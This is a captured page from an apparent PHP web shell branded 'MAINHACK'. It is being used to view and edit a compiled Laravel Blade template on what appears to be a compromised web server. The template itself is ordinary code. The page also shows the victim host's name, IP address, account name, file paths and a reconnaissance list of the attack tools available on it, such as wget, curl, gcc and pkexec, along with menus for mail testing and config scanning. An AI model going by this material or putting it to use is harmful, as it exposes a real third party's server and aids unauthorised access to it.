[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: 8a652cbd0c51b382cc7d4fe07b0aff7d.php
<?php $attributes ??= new \Illuminate\View\ComponentAttributeBag; ?> <?php foreach($attributes->onlyProps([ 'title' => '', 'breadcrumbs' => [], 'button' => false, 'route' => '', 'buttonTitle' => '', ]) as $__key => $__value) { $$__key = $$__key ?? $__value; } ?> <?php $attributes = $attributes->exceptProps([ 'title' => '', 'breadcrumbs' => [], 'button' => false, 'route' => '', 'buttonTitle' => '', ]); ?> <?php foreach (array_filter(([ 'title' => '', 'breadcrumbs' => [], 'button' => false, 'route' => '', 'buttonTitle' => '', ]), 'is_string', ARRAY_FILTER_USE_KEY) as $__key => $__value) { $$__key = $$__key ?? $__value; } ?> <?php $__defined_vars = get_defined_vars(); ?> <?php foreach ($attributes as $__key => $__value) { if (array_key_exists($__key, $__defined_vars)) unset($$__key); } ?> <?php unset($__defined_vars); ?> <div class="row mb-0 mb-1 align-content-center"> <div class="col-10"> <h3 class="mb-0"><?php echo e(translate($title)); ?></h3> <?php if($breadcrumbs && count($breadcrumbs) > 0): ?> <nav aria-label="breadcrumb"> <ol class="breadcrumb"> <li class="breadcrumb-item"><a href="<?php echo e(route('dashboard')); ?>"><?php echo e(translate('Dashboard')); ?></a></li> <?php $__currentLoopData = $breadcrumbs; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $item): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?> <li class="breadcrumb-item <?php echo e($loop->last ? 'active':''); ?>"> <a <?php if(isset($item['link'])): ?> href="<?php echo e(isset($item['link']) ? $item['link'] : '#'); ?>" <?php endif; ?> > <?php echo e(translate($item['label'])); ?> </a> </li> <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?> </ol> </nav> <?php endif; ?> </div> <?php if($button): ?> <div class="col-2 text-end"> <?php if(auth()->user()->super_admin): ?> <a class="btn btn-primary" href="<?php echo e(route($route)); ?>"> <?php echo e($buttonTitle); ?> </a> <?php else: ?> <a class="btn btn-primary" href="<?php echo e(route($route)); ?>"> <?php echo e($buttonTitle); ?> </a> <?php endif; ?> </div> <?php endif; ?> </div> <div class="card border-0 bg-white"> <div class="card-body"> <?php echo $slot; ?> </div> </div> <?php /**PATH /home/eliosofonline/pham.eliosof.com/resources/views/components/app-container.blade.php ENDPATH**/ ?>
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server1.winmanyltd.com
Server IP: 203.161.60.52
PHP Version: 8.3.27
Server Software: Apache
System: Linux server1.winmanyltd.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
HDD Total: 117.98 GB
HDD Free: 59.76 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
Yes
git:
Yes
User Info
Username: eliosofonline
User ID (UID): 1002
Group ID (GID): 1003
Script Owner UID: 1002
Current Dir Owner: 1002